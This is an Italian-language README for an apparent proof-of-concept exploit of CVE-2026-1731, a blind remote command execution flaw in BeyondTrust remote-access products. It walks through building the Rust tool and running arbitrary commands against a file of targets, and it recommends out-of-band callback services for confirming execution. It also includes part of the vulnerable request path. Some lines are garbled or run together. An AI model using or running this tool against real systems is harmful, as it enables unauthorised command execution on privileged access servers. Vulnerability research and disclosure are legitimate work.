
Proof-of-concept exploit per CVE-2026-1731, una RCE cieca in BeyondTrust Privileged Remote Access e Remote Support, che consente l'esecuzione remota di comandi sulle versioni vulnerabili.
Per ulteriori informazioni ti consiglio di leggere l'analisi di attackerkb.com.
Avrai bisogno dei seguenti strumenti per compilare questo PoC: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 si troverà in target/releasecd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
Puoi eseguire ./CVE-2026-1731 -h per visualizzare un elenco delle opzioni disponibili
./CVE-2026-1731 --targets targets.txt --command "whoami"
Nota: Poiché CVE-2026-1731 è un RCE cieco, non viene inviata alcuna risposta dall'host che possa essere utilizzata come indicatore di vulnerabilità. Una richiesta può avere successo, ma un target non vulnerabile non attiverà l'RCE. Si consiglia di utilizzare un servizio come webhook.site o PortSwigger's Burp Collaborator per testare i target. Un successo o un fallimento in questo PoC si basa sul fatto che il server risponda o meno con un codice di stato 200.
GET /get_rdf?comp=sdcust&locale_code=en-us.https://github.com/win3zz/CVE-2026-1731
https://nvd.nist.gov/vuln/detail/CVE-2026-1731